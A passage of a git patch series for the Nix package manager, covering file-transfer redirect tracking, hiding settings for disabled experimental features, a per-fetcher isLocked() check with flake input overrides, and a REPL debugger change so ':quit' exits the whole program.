-                fut.get();
+                auto res = fut.get();
+                if (resultCallback)
+                    resultCallback(std::move(res));
             } catch (...) {
                 state->exc = std::current_exception();
             }
diff --git a/src/libstore/filetransfer.hh b/src/libstore/filetransfer.hh
index a3b0dde1f..1c271cbec 100644
--- a/src/libstore/filetransfer.hh
+++ b/src/libstore/filetransfer.hh
@@ -75,14 +75,34 @@ struct FileTransferRequest
 
 struct FileTransferResult
 {
+    /**
+     * Whether this is a cache hit (i.e. the ETag supplied in the
+     * request is still valid). If so, `data` is empty.
+     */
     bool cached = false;
+
+    /**
+     * The ETag of the object.
+     */
     std::string etag;
-    std::string effectiveUri;
+
+    /**
+     * All URLs visited in the redirect chain.
+     */
+    std::vector urls;
+
+    /**
+     * The response body.
+     */
     std::string data;
+
     uint64_t bodySize = 0;
-    /* An "immutable" URL for this resource (i.e. one whose contents
-       will never change), as returned by the `Link: ;
-       rel="immutable"` header. */
+
+    /**
+     * An "immutable" URL for this resource (i.e. one whose contents
+     * will never change), as returned by the `Link: ;
+     * rel="immutable"` header.
+     */
     std::optional immutableUrl;
 };
 
@@ -116,7 +136,10 @@ struct FileTransfer
      * Download a file, writing its data to a sink. The sink will be
      * invoked on the thread of the caller.
      */
-    void download(FileTransferRequest && request, Sink & sink);
+    void download(
+        FileTransferRequest && request,
+        Sink & sink,
+        std::function resultCallback = {});
 
     enum Error { NotFound, Forbidden, Misc, Transient, Interrupted };
 };

From 0acd783190418af514b363685e010195ea7260bc Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 15:22:15 +0100
Subject: [PATCH 490/654] Don't send settings that depend on disabled
 experimental features to the daemon

This fixes warnings like

   warning: Ignoring setting 'auto-allocate-uids' because experimental feature 'auto-allocate-uids' is not enabled
   warning: Ignoring setting 'impure-env' because experimental feature 'configurable-impure-env' is not enabled

when using the daemon and the user didn't actually set those settings.

Note: this also hides those settings from `nix config show`, but that
seems a good thing.
---
 src/libutil/config-impl.hh                |  2 +-
 src/libutil/config.cc                     |  4 +++-
 tests/functional/experimental-features.sh | 10 ++++++----
 3 files changed, 10 insertions(+), 6 deletions(-)

diff --git a/src/libutil/config-impl.hh b/src/libutil/config-impl.hh
index 9f69e8444..1da0cb638 100644
--- a/src/libutil/config-impl.hh
+++ b/src/libutil/config-impl.hh
@@ -4,7 +4,7 @@
  *
  * Template implementations (as opposed to mere declarations).
  *
- * This file is an exmample of the "impl.hh" pattern. See the
+ * This file is an example of the "impl.hh" pattern. See the
  * contributing guide.
  *
  * One only needs to include this when one is declaring a
diff --git a/src/libutil/config.cc b/src/libutil/config.cc
index 37f5b50c7..617c2ec89 100644
--- a/src/libutil/config.cc
+++ b/src/libutil/config.cc
@@ -84,7 +84,9 @@ void AbstractConfig::reapplyUnknownSettings()
 void Config::getSettings(std::map & res, bool overriddenOnly)
 {
     for (const auto & opt : _settings)
-        if (!opt.second.isAlias && (!overriddenOnly || opt.second.setting->overridden))
+        if (!opt.second.isAlias
+            && (!overriddenOnly || opt.second.setting->overridden)
+            && experimentalFeatureSettings.isEnabled(opt.second.setting->experimentalFeature))
             res.emplace(opt.first, SettingInfo{opt.second.setting->to_string(), opt.second.setting->description});
 }
 
diff --git a/tests/functional/experimental-features.sh b/tests/functional/experimental-features.sh
index 9ee4a53d4..12112b293 100644
--- a/tests/functional/experimental-features.sh
+++ b/tests/functional/experimental-features.sh
@@ -31,17 +31,19 @@ source common.sh
 NIX_CONFIG='
   experimental-features = nix-command
   accept-flake-config = true
-' nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
-grepQuiet "false" $TEST_ROOT/stdout
+' expect 1 nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
+[[ $(cat $TEST_ROOT/stdout) = '' ]]
 grepQuiet "Ignoring setting 'accept-flake-config' because experimental feature 'flakes' is not enabled" $TEST_ROOT/stderr
+grepQuiet "error: could not find setting 'accept-flake-config'" $TEST_ROOT/stderr
 
 # 'flakes' experimental-feature is disabled after, ignore and warn
 NIX_CONFIG='
   accept-flake-config = true
   experimental-features = nix-command
-' nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
-grepQuiet "false" $TEST_ROOT/stdout
+' expect 1 nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
+[[ $(cat $TEST_ROOT/stdout) = '' ]]
 grepQuiet "Ignoring setting 'accept-flake-config' because experimental feature 'flakes' is not enabled" $TEST_ROOT/stderr
+grepQuiet "error: could not find setting 'accept-flake-config'" $TEST_ROOT/stderr
 
 # 'flakes' experimental-feature is enabled before, process
 NIX_CONFIG='

From 071dd2b3a4e6c0b2106f1b6f14ec26e153d97446 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 16 Feb 2024 17:00:07 +0100
Subject: [PATCH 491/654] Input: Replace 'locked' bool by isLocked() method

It's better to just check whether the input has all the attributes
needed to consider itself locked (e.g. whether a Git input has an
'rev' attribute).

Also, the 'locked' field was actually incorrect for Git inputs: it
would be set to true even for dirty worktrees. As a result, we got
away with using fetchTree() internally even though fetchTree()
requires a locked input in pure mode. In particular, this allowed
'--override-input' to work by accident.

The fix is to pass a set of "overrides" to call-flake.nix for all the
unlocked inputs (i.e. the top-level flake and any --override-inputs).
---
 src/libexpr/flake/call-flake.nix | 61 ++++++++++++++---------
 src/libexpr/flake/flake.cc       | 84 ++++++++++++++++++++------------
 src/libexpr/flake/flake.hh       |  7 +++
 src/libexpr/flake/lockfile.cc    | 17 ++++---
 src/libexpr/flake/lockfile.hh    |  7 +--
 src/libexpr/primops/fetchTree.cc |  6 +--
 src/libfetchers/fetchers.cc      | 11 ++---
 src/libfetchers/fetchers.hh      | 12 +++--
 src/libfetchers/git.cc           |  7 ++-
 src/libfetchers/github.cc        |  5 ++
 src/libfetchers/mercurial.cc     |  5 ++
 src/libfetchers/path.cc          |  5 ++
 src/libfetchers/tarball.cc       |  5 ++
 src/nix-env/nix-env.cc           |  2 +-
 src/nix/flake.cc                 |  2 +-
 tests/functional/fetchGit.sh     |  4 +-
 16 files changed, 155 insertions(+), 85 deletions(-)

diff --git a/src/libexpr/flake/call-flake.nix b/src/libexpr/flake/call-flake.nix
index 4beb0b0fe..d0ccb1e37 100644
--- a/src/libexpr/flake/call-flake.nix
+++ b/src/libexpr/flake/call-flake.nix
@@ -1,20 +1,52 @@
-lockFileStr: rootSrc: rootSubdir:
+# This is a helper to callFlake() to lazily fetch flake inputs.
+
+# The contents of the lock file, in JSON format.
+lockFileStr:
+
+# A mapping of lock file node IDs to { sourceInfo, subdir } attrsets,
+# with sourceInfo.outPath providing an InputAccessor to a previously
+# fetched tree. This is necessary for possibly unlocked inputs, in
+# particular the root input, but also --override-inputs pointing to
+# unlocked trees.
+overrides:
 
 let
 
   lockFile = builtins.fromJSON lockFileStr;
 
+  # Resolve a input spec into a node name. An input spec is
+  # either a node name, or a 'follows' path from the root
+  # node.
+  resolveInput = inputSpec:
+    if builtins.isList inputSpec
+    then getInputByPath lockFile.root inputSpec
+    else inputSpec;
+
+  # Follow an input path (e.g. ["dwarffs" "nixpkgs"]) from the
+  # root node, returning the final node.
+  getInputByPath = nodeName: path:
+    if path == []
+    then nodeName
+    else
+      getInputByPath
+        # Since this could be a 'follows' input, call resolveInput.
+        (resolveInput lockFile.nodes.${nodeName}.inputs.${builtins.head path})
+        (builtins.tail path);
+
   allNodes =
     builtins.mapAttrs
       (key: node:
         let
 
           sourceInfo =
-            if key == lockFile.root
-            then rootSrc
-            else fetchTree (node.info or {} // removeAttrs node.locked ["dir"]);
+            if overrides ? ${key}
+            then
+              overrides.${key}.sourceInfo
+            else
+              # FIXME: remove obsolete node.info.
+              fetchTree (node.info or {} // removeAttrs node.locked ["dir"]);
 
-          subdir = if key == lockFile.root then rootSubdir else node.locked.dir or "";
+          subdir = overrides.${key}.dir or node.locked.dir or "";
 
           outPath = sourceInfo + ((if subdir == "" then "" else "/") + subdir);
 
@@ -24,25 +56,6 @@ let
             (inputName: inputSpec: allNodes.${resolveInput inputSpec})
             (node.inputs or {});
 
-          # Resolve a input spec into a node name. An input spec is
-          # either a node name, or a 'follows' path from the root
-          # node.
-          resolveInput = inputSpec:
-              if builtins.isList inputSpec
-              then getInputByPath lockFile.root inputSpec
-              else inputSpec;
-
-          # Follow an input path (e.g. ["dwarffs" "nixpkgs"]) from the
-          # root node, returning the final node.
-          getInputByPath = nodeName: path:
-            if path == []
-            then nodeName
-            else
-              getInputByPath
-                # Since this could be a 'follows' input, call resolveInput.
-                (resolveInput lockFile.nodes.${nodeName}.inputs.${builtins.head path})
-                (builtins.tail path);
-
           outputs = flake.outputs (inputs // { self = result; });
 
           result =
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index 451780c89..022d39cdb 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -365,6 +365,7 @@ LockedFlake lockFlake(
         std::map overrides;
         std::set explicitCliOverrides;
         std::set overridesUsed, updatesUsed;
+        std::map, StorePath> nodePaths;
 
         for (auto & i : lockFlags.inputOverrides) {
             overrides.insert_or_assign(i.first, FlakeInput { .ref = i.second });
@@ -535,11 +536,13 @@ LockedFlake lockFlake(
                             }
                         }
 
-                        computeLocks(
-                            mustRefetch
-                            ? getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath).inputs
-                            : fakeInputs,
-                            childNode, inputPath, oldLock, lockRootPath, parentPath, !mustRefetch);
+                        if (mustRefetch) {
+                            auto inputFlake = getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath);
+                            nodePaths.emplace(childNode, inputFlake.storePath);
+                            computeLocks(inputFlake.inputs, childNode, inputPath, oldLock, lockRootPath, parentPath, false);
+                        } else {
+                            computeLocks(fakeInputs, childNode, inputPath, oldLock, lockRootPath, parentPath, true);
+                        }
 
                     } else {
                         /* We need to create a new lock file entry. So fetch
@@ -584,6 +587,7 @@ LockedFlake lockFlake(
                                flake. Also, unless we already have this flake
                                in the top-level lock file, use this flake's
                                own lock file. */
+                            nodePaths.emplace(childNode, inputFlake.storePath);
                             computeLocks(
                                 inputFlake.inputs, childNode, inputPath,
                                 oldLock
@@ -596,11 +600,13 @@ LockedFlake lockFlake(
                         }
 
                         else {
-                            auto [sourceInfo, resolvedRef, lockedRef] = fetchOrSubstituteTree(
+                            auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
                                 state, *input.ref, useRegistries, flakeCache);
 
                             auto childNode = make_ref(lockedRef, ref, false);
 
+                            nodePaths.emplace(childNode, storePath);
+
                             node->inputs.insert_or_assign(id, childNode);
                         }
                     }
@@ -615,6 +621,8 @@ LockedFlake lockFlake(
         // Bring in the current ref for relative path resolution if we have it
         auto parentPath = canonPath(state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir, true);
 
+        nodePaths.emplace(newLockFile.root, flake.storePath);
+
         computeLocks(
             flake.inputs,
             newLockFile.root,
@@ -707,14 +715,6 @@ LockedFlake lockFlake(
                             flake.lockedRef.input.getRev() &&
                             prevLockedRef.input.getRev() != flake.lockedRef.input.getRev())
                             warn("committed new revision '%s'", flake.lockedRef.input.getRev()->gitRev());
-
-                        /* Make sure that we picked up the change,
-                           i.e. the tree should usually be dirty
-                           now. Corner case: we could have reverted from a
-                           dirty to a clean tree! */
-                        if (flake.lockedRef.input == prevLockedRef.input
-                            && !flake.lockedRef.input.isLocked())
-                            throw Error("'%s' did not change after I updated its 'flake.lock' file; is 'flake.lock' under version control?", flake.originalRef);
                     }
                 } else
                     throw Error("cannot write modified lock file of flake '%s' (use '--no-write-lock-file' to ignore)", topRef);
@@ -724,7 +724,11 @@ LockedFlake lockFlake(
             }
         }
 
-        return LockedFlake { .flake = std::move(flake), .lockFile = std::move(newLockFile) };
+        return LockedFlake {
+            .flake = std::move(flake),
+            .lockFile = std::move(newLockFile),
+            .nodePaths = std::move(nodePaths)
+        };
 
     } catch (Error & e) {
         e.addTrace({}, "while updating the lock file of flake '%s'", flake.lockedRef.to_string());
@@ -736,30 +740,48 @@ void callFlake(EvalState & state,
     const LockedFlake & lockedFlake,
     Value & vRes)
 {
-    auto vLocks = state.allocValue();
-    auto vRootSrc = state.allocValue();
-    auto vRootSubdir = state.allocValue();
-    auto vTmp1 = state.allocValue();
-    auto vTmp2 = state.allocValue();
+    experimentalFeatureSettings.require(Xp::Flakes);
 
-    vLocks->mkString(lockedFlake.lockFile.to_string());
+    auto [lockFileStr, keyMap] = lockedFlake.lockFile.to_string();
 
-    emitTreeAttrs(
-        state,
-        lockedFlake.flake.storePath,
-        lockedFlake.flake.lockedRef.input,
-        *vRootSrc,
-        false,
-        lockedFlake.flake.forceDirty);
+    auto overrides = state.buildBindings(lockedFlake.nodePaths.size());
 
-    vRootSubdir->mkString(lockedFlake.flake.lockedRef.subdir);
+    for (auto & [node, storePath] : lockedFlake.nodePaths) {
+        auto override = state.buildBindings(2);
+
+        auto & vSourceInfo = override.alloc(state.symbols.create("sourceInfo"));
+
+        auto lockedNode = node.dynamic_pointer_cast();
+
+        emitTreeAttrs(
+            state,
+            storePath,
+            lockedNode ? lockedNode->lockedRef.input : lockedFlake.flake.lockedRef.input,
+            vSourceInfo,
+            false,
+            !lockedNode && lockedFlake.flake.forceDirty);
+
+        auto key = keyMap.find(node);
+        assert(key != keyMap.end());
+
+        override
+            .alloc(state.symbols.create("dir"))
+            .mkString(lockedNode ? lockedNode->lockedRef.subdir : lockedFlake.flake.lockedRef.subdir);
+
+        overrides.alloc(state.symbols.create(key->second)).mkAttrs(override);
+    }
+
+    auto & vOverrides = state.allocValue()->mkAttrs(overrides);
 
     auto vCallFlake = state.allocValue();
     state.evalFile(state.callFlakeInternal, *vCallFlake);
 
+    auto vTmp1 = state.allocValue();
+    auto vLocks = state.allocValue();
+    vLocks->mkString(lockFileStr);
     state.callFunction(*vCallFlake, *vLocks, *vTmp1, noPos);
-    state.callFunction(*vTmp1, *vRootSrc, *vTmp2, noPos);
-    state.callFunction(*vTmp2, *vRootSubdir, vRes, noPos);
+
+    state.callFunction(*vTmp1, vOverrides, vRes, noPos);
 }
 
 static void prim_getFlake(EvalState & state, const PosIdx pos, Value * * args, Value & v)
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index d5ad3eade..19b680c56 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -103,6 +103,13 @@ struct LockedFlake
     Flake flake;
     LockFile lockFile;
 
+    /**
+     * Store paths of nodes that have been fetched in
+     * lockFlake(); in particular, the root node and the overriden
+     * inputs.
+     */
+    std::map, StorePath> nodePaths;
+
     Fingerprint getFingerprint() const;
 };
 
diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index 3e99fb2d4..2c16dc802 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -38,7 +38,7 @@ LockedNode::LockedNode(const nlohmann::json & json)
     , isFlake(json.find("flake") != json.end() ? (bool) json["flake"] : true)
 {
     if (!lockedRef.input.isLocked())
-        throw Error("lock file contains mutable lock '%s'",
+        throw Error("lock file contains unlocked input '%s'",
             fetchers::attrsToJSON(lockedRef.input.toAttrs()));
 }
 
@@ -134,10 +134,10 @@ LockFile::LockFile(const nlohmann::json & json, const Path & path)
     // a bit since we don't need to worry about cycles.
 }
 
-nlohmann::json LockFile::toJSON() const
+std::pair LockFile::toJSON() const
 {
     nlohmann::json nodes;
-    std::unordered_map, std::string> nodeKeys;
+    KeyMap nodeKeys;
     std::unordered_set keys;
 
     std::function node)> dumpNode;
@@ -194,12 +194,13 @@ nlohmann::json LockFile::toJSON() const
     json["root"] = dumpNode("root", root);
     json["nodes"] = std::move(nodes);
 
-    return json;
+    return {json, std::move(nodeKeys)};
 }
 
-std::string LockFile::to_string() const
+std::pair LockFile::to_string() const
 {
-    return toJSON().dump(2);
+    auto [json, nodeKeys] = toJSON();
+    return {json.dump(2), std::move(nodeKeys)};
 }
 
 LockFile LockFile::read(const Path & path)
@@ -210,7 +211,7 @@ LockFile LockFile::read(const Path & path)
 
 std::ostream & operator <<(std::ostream & stream, const LockFile & lockFile)
 {
-    stream << lockFile.toJSON().dump(2);
+    stream << lockFile.toJSON().first.dump(2);
     return stream;
 }
 
@@ -243,7 +244,7 @@ std::optional LockFile::isUnlocked() const
 bool LockFile::operator ==(const LockFile & other) const
 {
     // FIXME: slow
-    return toJSON() == other.toJSON();
+    return toJSON().first == other.toJSON().first;
 }
 
 bool LockFile::operator !=(const LockFile & other) const
diff --git a/src/libexpr/flake/lockfile.hh b/src/libexpr/flake/lockfile.hh
index 5a1493404..57a7202a2 100644
--- a/src/libexpr/flake/lockfile.hh
+++ b/src/libexpr/flake/lockfile.hh
@@ -59,14 +59,15 @@ struct LockFile
 
     typedef std::map, std::string> KeyMap;
 
-    nlohmann::json toJSON() const;
+    std::pair toJSON() const;
 
-    std::string to_string() const;
+    std::pair to_string() const;
 
     static LockFile read(const Path & path);
 
     /**
-     * Check whether this lock file has any unlocked inputs.
+     * Check whether this lock file has any unlocked inputs. If so,
+     * return one.
      */
     std::optional isUnlocked() const;
 
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index 1997d5513..b4d9a6189 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -24,8 +24,6 @@ void emitTreeAttrs(
     bool emptyRevFallback,
     bool forceDirty)
 {
-    assert(input.isLocked());
-
     auto attrs = state.buildBindings(100);
 
     state.mkStorePathString(storePath, attrs.alloc(state.sOutPath));
@@ -176,8 +174,8 @@ static void fetchTree(
             fetcher = "fetchGit";
 
         state.error(
-            "in pure evaluation mode, %s requires a locked input",
-            fetcher
+            "in pure evaluation mode, '%s' will not fetch unlocked input '%s'",
+            fetcher, input.to_string()
         ).atPos(pos).debugThrow();
     }
 
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 9a534c1e2..363ad018e 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -45,12 +45,8 @@ static void fixupInput(Input & input)
     // Check common attributes.
     input.getType();
     input.getRef();
-    if (input.getRev())
-        input.locked = true;
     input.getRevCount();
     input.getLastModified();
-    if (input.getNarHash())
-        input.locked = true;
 }
 
 Input Input::fromURL(const ParsedURL & url, bool requireTree)
@@ -140,6 +136,11 @@ bool Input::isDirect() const
     return !scheme || scheme->isDirect(*this);
 }
 
+bool Input::isLocked() const
+{
+    return scheme && scheme->isLocked(*this);
+}
+
 Attrs Input::toAttrs() const
 {
     return attrs;
@@ -222,8 +223,6 @@ std::pair Input::fetch(ref store) const
                 input.to_string(), *prevRevCount);
     }
 
-    input.locked = true;
-
     return {std::move(storePath), input};
 }
 
diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh
index 036647830..472fba6f4 100644
--- a/src/libfetchers/fetchers.hh
+++ b/src/libfetchers/fetchers.hh
@@ -29,7 +29,6 @@ struct Input
 
     std::shared_ptr scheme; // note: can be null
     Attrs attrs;
-    bool locked = false;
 
     /**
      * path of the parent of this input, used for relative path resolution
@@ -71,7 +70,7 @@ public:
      * Check whether this is a "locked" input, that is,
      * one that contains a commit hash or content hash.
      */
-    bool isLocked() const { return locked; }
+    bool isLocked() const;
 
     bool operator ==(const Input & other) const;
 
@@ -121,7 +120,6 @@ public:
     std::optional getFingerprint(ref store) const;
 };
 
-
 /**
  * The `InputScheme` represents a type of fetcher.  Each fetcher
  * registers with nix at startup time.  When processing an `Input`,
@@ -196,6 +194,14 @@ struct InputScheme
      */
     virtual std::optional getFingerprint(ref store, const Input & input) const
     { return std::nullopt; }
+
+    /**
+     * Return `true` if this input is considered "locked", i.e. it has
+     * attributes like a Git revision or NAR hash that uniquely
+     * identify its contents.
+     */
+    virtual bool isLocked(const Input & input) const
+    { return false; }
 };
 
 void registerInputScheme(std::shared_ptr && fetcher);
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 97ef35b51..87d114276 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -737,8 +737,6 @@ struct GitInputScheme : InputScheme
             ? getLastModified(repoInfo, repoInfo.url, *repoInfo.workdirInfo.headRev)
             : 0);
 
-        input.locked = true; // FIXME
-
         return {accessor, std::move(input)};
     }
 
@@ -775,6 +773,11 @@ struct GitInputScheme : InputScheme
         else
             return std::nullopt;
     }
+
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getRev();
+    }
 };
 
 static auto rGitInputScheme = OnStartup([] { registerInputScheme(std::make_unique()); });
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index e6fbece13..76f94337b 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -280,6 +280,11 @@ struct GitArchiveInputScheme : InputScheme
         return {accessor, input};
     }
 
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getRev();
+    }
+
     std::optional experimentalFeature() const override
     {
         return Xp::Flakes;
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc
index 55e2eae03..a5f55a44e 100644
--- a/src/libfetchers/mercurial.cc
+++ b/src/libfetchers/mercurial.cc
@@ -347,6 +347,11 @@ struct MercurialInputScheme : InputScheme
         return makeResult(infoAttrs, std::move(storePath));
     }
 
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getRev();
+    }
+
     std::optional getFingerprint(ref store, const Input & input) const override
     {
         if (auto rev = input.getRev())
diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index d3b0e475d..276fd1b36 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -87,6 +87,11 @@ struct PathInputScheme : InputScheme
         writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents);
     }
 
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getNarHash();
+    }
+
     CanonPath getAbsPath(const Input & input) const
     {
         auto path = getStrAttr(input.attrs, "path");
diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc
index 3b7709440..1d80fd880 100644
--- a/src/libfetchers/tarball.cc
+++ b/src/libfetchers/tarball.cc
@@ -260,6 +260,11 @@ struct CurlInputScheme : InputScheme
             url.query.insert_or_assign("narHash", narHash->to_string(HashFormat::SRI, true));
         return url;
     }
+
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getNarHash();
+    }
 };
 
 struct FileInputScheme : CurlInputScheme
diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc
index 1f311733b..5e3de20c5 100644
--- a/src/nix-env/nix-env.cc
+++ b/src/nix-env/nix-env.cc
@@ -143,7 +143,7 @@ static void getAllExprs(EvalState & state,
             }
             /* Load the expression on demand. */
             auto vArg = state.allocValue();
-            vArg->mkString(path2.path.abs());
+            vArg->mkPath(path2);
             if (seen.size() == maxAttrs)
                 throw Error("too many Nix expressions in directory '%1%'", path);
             attrs.alloc(attrName).mkApp(&state.getBuiltin("import"), vArg);
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 4504bb22e..131589f35 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -224,7 +224,7 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
             if (auto lastModified = flake.lockedRef.input.getLastModified())
                 j["lastModified"] = *lastModified;
             j["path"] = store->printStorePath(flake.storePath);
-            j["locks"] = lockedFlake.lockFile.toJSON();
+            j["locks"] = lockedFlake.lockFile.toJSON().first;
             logger->cout("%s", j.dump());
         } else {
             logger->cout(
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index 856c0e534..3f2d0d5fb 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -70,7 +70,7 @@ path2=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \"
 [[ $(nix eval --raw --expr "builtins.readFile (fetchGit { url = file://$repo; rev = \"$rev2\"; } + \"/hello\")") = world ]]
 
 # But without a hash, it fails
-expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "fetchGit requires a locked input"
+expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "'fetchGit' will not fetch unlocked input"
 
 # Fetch again. This should be cached.
 mv $repo ${repo}-tmp
@@ -211,7 +211,7 @@ path6=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; ur
 [[ $path3 = $path6 ]]
 [[ $(nix eval --impure --expr "(builtins.fetchTree { type = \"git\"; url = \"file://$TEST_ROOT/shallow\"; ref = \"dev\"; shallow = true; }).revCount or 123") == 123 ]]
 
-expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "fetchTree requires a locked input"
+expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "'fetchTree' will not fetch unlocked input"
 
 # Explicit ref = "HEAD" should work, and produce the same outPath as without ref
 path7=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; ref = \"HEAD\"; }).outPath")

From 2a8fe9a93837733e9dd9ed5c078734a35b203e14 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Fri, 2 Feb 2024 18:53:49 -0800
Subject: [PATCH 492/654] `:quit` in the debugger should quit the whole program

---
 src/libcmd/repl.cc              | 63 ++++++++++++++++++++++++---------
 src/libcmd/repl.hh              |  4 +--
 src/libexpr/eval.cc             | 14 ++++++--
 src/libexpr/eval.hh             |  5 ++-
 src/libexpr/primops.cc          | 11 +-----
 src/libexpr/repl-exit-status.hh | 20 +++++++++++
 src/libmain/shared.cc           |  2 --
 src/libmain/shared.hh           | 10 +-----
 src/libutil/exit.cc             |  7 ++++
 src/libutil/exit.hh             | 19 ++++++++++
 10 files changed, 111 insertions(+), 44 deletions(-)
 create mode 100644 src/libexpr/repl-exit-status.hh
 create mode 100644 src/libutil/exit.cc
 create mode 100644 src/libutil/exit.hh

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 03602e170..e423df3fe 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -52,6 +52,27 @@ extern "C" {
 
 namespace nix {
 
+/**
+ * Returned by `NixRepl::processLine`.
+ */
+enum class ProcessLineResult {
+    /**
+     * The user exited with `:quit`. The REPL should exit. The surrounding
+     * program or evaluation (e.g., if the REPL was acting as the debugger)
+     * should also exit.
+     */
+    QuitAll,
+    /**
+     * The user exited with `:continue`. The REPL should exit, but the program
+     * should continue running.
+     */
+    QuitOnce,
+    /**
+     * The user did not exit. The REPL should request another line of input.
+     */
+    Continue,
+};
+
 struct NixRepl
     : AbstractNixRepl
     #if HAVE_BOEHMGC
@@ -75,13 +96,13 @@ struct NixRepl
             std::function getValues);
     virtual ~NixRepl();
 
-    void mainLoop() override;
+    ReplExitStatus mainLoop() override;
     void initEnv() override;
 
     StringSet completePrefix(const std::string & prefix);
     bool getLine(std::string & input, const std::string & prompt);
     StorePath getDerivationPath(Value & v);
-    bool processLine(std::string line);
+    ProcessLineResult processLine(std::string line);
 
     void loadFile(const Path & path);
     void loadFlake(const std::string & flakeRef);
@@ -246,7 +267,7 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi
 
 static bool isFirstRepl = true;
 
-void NixRepl::mainLoop()
+ReplExitStatus NixRepl::mainLoop()
 {
     if (isFirstRepl) {
         std::string_view debuggerNotice = "";
@@ -287,15 +308,25 @@ void NixRepl::mainLoop()
         // When continuing input from previous lines, don't print a prompt, just align to the same
         // number of chars as the prompt.
         if (!getLine(input, input.empty() ? "nix-repl> " : "          ")) {
-            // ctrl-D should exit the debugger.
+            // Ctrl-D should exit the debugger.
             state->debugStop = false;
-            state->debugQuit = true;
             logger->cout("");
-            break;
+            // TODO: Should Ctrl-D exit just the current debugger session or
+            // the entire program?
+            return ReplExitStatus::QuitAll;
         }
         logger->resume();
         try {
-            if (!removeWhitespace(input).empty() && !processLine(input)) return;
+            switch (processLine(input)) {
+                case ProcessLineResult::QuitAll:
+                    return ReplExitStatus::QuitAll;
+                case ProcessLineResult::QuitOnce:
+                    return ReplExitStatus::Continue;
+                case ProcessLineResult::Continue:
+                    break;
+                default:
+                    abort();
+            }
         } catch (ParseError & e) {
             if (e.msg().find("unexpected end of file") != std::string::npos) {
                 // For parse errors on incomplete input, we continue waiting for the next line of
@@ -483,10 +514,11 @@ void NixRepl::loadDebugTraceEnv(DebugTrace & dt)
     }
 }
 
-bool NixRepl::processLine(std::string line)
+ProcessLineResult NixRepl::processLine(std::string line)
 {
     line = trim(line);
-    if (line == "") return true;
+    if (line.empty())
+        return ProcessLineResult::Continue;
 
     _isInterrupted = false;
 
@@ -581,13 +613,13 @@ bool NixRepl::processLine(std::string line)
     else if (state->debugRepl && (command == ":s" || command == ":step")) {
         // set flag to stop at next DebugTrace; exit repl.
         state->debugStop = true;
-        return false;
+        return ProcessLineResult::QuitOnce;
     }
 
     else if (state->debugRepl && (command == ":c" || command == ":continue")) {
         // set flag to run to next breakpoint or end of program; exit repl.
         state->debugStop = false;
-        return false;
+        return ProcessLineResult::QuitOnce;
     }
 
     else if (command == ":a" || command == ":add") {
@@ -730,8 +762,7 @@ bool NixRepl::processLine(std::string line)
 
     else if (command == ":q" || command == ":quit") {
         state->debugStop = false;
-        state->debugQuit = true;
-        return false;
+        return ProcessLineResult::QuitAll;
     }
 
     else if (command == ":doc") {
@@ -792,7 +823,7 @@ bool NixRepl::processLine(std::string line)
         }
     }
 
